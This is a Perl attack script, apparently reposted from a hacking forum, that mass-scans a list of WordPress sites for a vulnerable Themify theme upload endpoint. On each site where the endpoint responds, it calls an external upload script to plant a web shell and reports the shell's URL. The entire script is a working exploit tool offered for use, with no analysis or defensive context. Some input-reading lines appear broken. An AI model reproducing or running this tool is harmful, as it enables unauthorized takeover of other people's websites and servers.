#!/usr/bin/perl
# Coded by "Paradox"
# Recoded By "Zeuxhaxor"

use LWP::Simple;
use HTTP::Request::Common;
use Term::ANSIColor;
$ua = LWP::UserAgent->new;

print color("blue"),"[+] WordPress Auto Upload "zeuxhaxor@yahoo.com" [+]\n\n ";
print color 'reset';
print "Masukan List Target: ";
$file = ;
chomp($file);
open (file, "<$file") || die "[-] Can't open the List of site file !"; my @file = ;
close file;
foreach $webs (@file)
{
chomp($webs);
$site = $webs;
$site =~ s/http:\/\///;
$site =~ s/https:\/\///;

print color("blue"), "\n[+] Scanning http://$site";
$tbk = LWP::UserAgent->new() or die "Could not initialize browser\n";
$tbk->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)');
$tembaka = "http://$site/index.php";
$_door = $tbk->request(HTTP::Request->new(GET=>$tembaka));
$tbkk = $_door->content;
if ($tbkk =~ m/\/wp-content\/themes\/(.*)\/style.min.css/){
$themex = $1;
print color 'reset';
}
if ($tbkk =~ m/\/wp-content\/themes\/(.*)\/style.css/){
$themex = $1;
print color 'reset';
}
my $param = $themex;
if (defined $param) {
print color("white"), "\n[+] Themes Found => $param ";
$targetku = "$site/wp-content/themes/$themex/themify/themify-ajax.php?upload=1";
$targetku =~ s/\/\//\//;
$tembaka = "http://$targetku";
$_woot = $tbk->request(HTTP::Request->new(GET=>$tembaka));
if ($_woot->is_success){
print color("bold green"),"\n[?] Vuln -> http://$site";
print "\n[?] Exploit.......";
system "php upload.php $targetku";
$tembaka = "http://$site/wp-content/themes/$themex/uploads/up.php";
$_door = $tbk->request(HTTP::Request->new(GET=>$tembaka));
if ($_door->is_success){
print color("bold white"),"\n [+] Shell Created ";
print "\n [+] Shell : $tembaka ";
}
else {
print "\n [+] Exploit Gagal bro ";
}
}else{
print color("bold red"),"\n[?] Not Vuln -> http://$site";
}
}else{
print color("bold red"), "\n[+] Themes not found -_-";
}
print color 'reset';
}

Read more: http://www.bitshacking.com/forum/exploits-vulnerabilities/56107-wordpress-auto-upload.html#ixzz349pgrM2O